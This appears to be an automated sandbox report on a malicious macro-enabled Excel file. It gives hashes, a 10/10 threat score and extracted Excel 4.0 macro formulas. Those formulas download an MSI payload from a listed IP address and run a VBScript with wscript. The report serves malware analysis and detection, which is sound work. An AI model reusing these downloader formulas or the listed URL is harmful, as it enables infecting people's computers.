General
-
Target
286c28e6219d609162a753d5bb6586d6
-
Size
6KB
-
Sample
231221-3my4dsbdfp
-
MD5
286c28e6219d609162a753d5bb6586d6
-
SHA1
adfb68e16213829c0a66abf5ee44d707c1e1609e
-
SHA256
b3a522465d54dc67e872518f6ff471be5b04da67eeed60fba69769cfe003a4c7
-
SHA512
0200bfd25a922224f163c1ce5d179fb349db1e75bd95d2b179e9c74130bfd37a0980bc05f2166d8d94c20612d48bcee8524d6b9afee7e702ec3a5df6d03d850a
-
SSDEEP
192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ykfD+U:N+uYM2wY1FYZb98yyD
Static task
static1
Behavioral task
behavioral1
Sample
286c28e6219d609162a753d5bb6586d6.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
286c28e6219d609162a753d5bb6586d6.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Targets
-
-
Target
286c28e6219d609162a753d5bb6586d6
-
Size
6KB
-
MD5
286c28e6219d609162a753d5bb6586d6
-
SHA1
adfb68e16213829c0a66abf5ee44d707c1e1609e
-
SHA256
b3a522465d54dc67e872518f6ff471be5b04da67eeed60fba69769cfe003a4c7
-
SHA512
0200bfd25a922224f163c1ce5d179fb349db1e75bd95d2b179e9c74130bfd37a0980bc05f2166d8d94c20612d48bcee8524d6b9afee7e702ec3a5df6d03d850a
-
SSDEEP
192:NDStuSDbrA2OmmfR+8UhHFBFYuYb98ykfD+U:N+uYM2wY1FYZb98yyD
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-